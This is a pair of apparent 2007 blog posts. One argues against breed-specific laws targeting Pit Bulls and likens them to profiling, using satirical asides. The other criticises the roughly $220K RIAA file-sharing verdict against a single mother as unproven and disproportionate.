The only suggestion that I would have had to offer if I had seen this in time would be to put it in the station’s dog run, put out some food and water, then start trying to locate the owner or place him/her with a rescue group. I’ll warn you in advance that the rescue groups are completely clogged with dogs and they don’t want any more. Most of the ones that I called told me to take the dog to a vet and have them put down as the most expedient and humane way to rid the planet of yet another unwanted Pit Bull. No, I’m not exaggerating, that’s what I was told, over and over. That’s why we boarded the one that we rescued for so long.


I did some more research and found out that Pit Bulls have been discriminated against in many parts of the world. The article I found online about breed specific laws gives you a wealth of information about this issue.

The whole issue is murky for a host of reasons. The first is the definition of ‘Pit Bull’ itself. As it turns out, Pit Bull is not a breed of dog. It is a generic term applied to dogs used in dog fights, which are generally believed to be aggressive, and hence dangerous to humans when left unsupervised.
Wikipedia’s definition of a Pit Bull is:

Pit bull is a term commonly used to describe several types of dogs with similar physical characteristics. Its use in media is often vague and rarely descriptive of specific breeds. There are several physically similar breeds that are often termed “pit bull”, including the American Pit Bull Terrier, American Staffordshire Terrier, the Staffordshire Bull Terrier, the Bull Terrier, the Perro de Presa Canario, Cane Corso, and Argentine Dogos. These breeds are usually not included by name in any Breed Specific Legislation (see below), but are sometimes included because of a broad definition and confusion as to what a pit bull actually is.

So it turns out that the term Pit Bull is a form of profiling, much like the profiling that is done by the U.S. Department of Homeland Security and the FAA, where amazingly some (specific) people always seem to be randomly selected for security checks every time they fly.

A related legal ambiguity is this: if Pit Bulls are not a breed and are not clearly defined, then how do you implement a law against a breed that (a) doesn’t exist, and (b) has no clear definition? The argument for it is typically the “Defining Obscenity” argument from the legal proceedings about defining ‘hard-core’ pornography, which goes something like this: “I shall not today attempt further to define the kinds of material I understand to be embraced . . . [b]ut I know it when I see it . . .”

But in the middle of all this confusion the dogs have been left unprotected. It is important to remember that dogs are a human-created species, produced through selective breeding of members of the Grey Wolf species. That thrusts a moral responsibility on us as to how we should treat them. If we choose to make laws about them, then we should ensure that these laws are ‘fair’, much like the laws about humans should be fair (of course, torture must be legalized in the national interest, and all Arabs and Arab-looking people must be randomly selected for additional security checks on all flights).

$220K, the RIAA, and more
http://www.semanticoverload.com/2007/10/08/220k-the-riaa-and-more/
Tue, 09 Oct 2007 00:53:13 +0000, Semantic Overload

Now that Jaimme Thomas has decided to appeal against the verdict that held her liable to the tune of $220K in the RIAA lawsuit, the old debate about copyright laws, Digital Rights Management and the RIAA itself has resurfaced.

For starters, the case itself was resolved in a somewhat shady manner. The judge required that the jury merely conclude whether or not the music files were made available for sharing. There was no requirement to prove that the files were actually copied illegally. This is like having to pay a hefty sum for leaving your CD out in public for anyone to copy. How can I be held responsible for what someone else does with my CD? I have no control over that! I am not saying Jaimme Thomas is innocent, but I am arguing that she has not been proven guilty. That, in my opinion, makes all the difference.

Secondly, there is no way for the recording industry to put any figure on how much money it is losing due to illegal file sharing. So I cannot understand on what basis the figure of $220K was arrived at. Typically such fines serve two purposes: (a) they serve as a deterrent against the crime, and (b) they compensate the aggrieved party adequately. This fine does neither.

Jaimme Thomas makes $36,000 a year. It will take her over 8 years to pay that sum if she subsists on food stamps, sells her kidney, puts her kids up for adoption and lives under the bridge. Practically speaking, if she is forced to pay the fine, she will have to declare bankruptcy. Hardly fitting punishment for the crime! If over-reaction works, then why not send everyone to the gallows?

Thirdly, when the RIAA has no idea how much money it loses to illegal file sharing, and does not know if the files in question in this case were shared or not, then on what basis can anyone state that the RIAA has been adequately compensated? Especially if the files were never illegally downloaded at all!

If the RIAA continues on this war path, it will only serve to make people more militant, and to deter artists from the recording labels. The internet is turning out to be a great equalizer. Artists can now sell their music independently on the internet through sites like Myspace.

So where is RIAA going with this? I suspect to their own demise, or at the least to a self inflicted embarrassment.
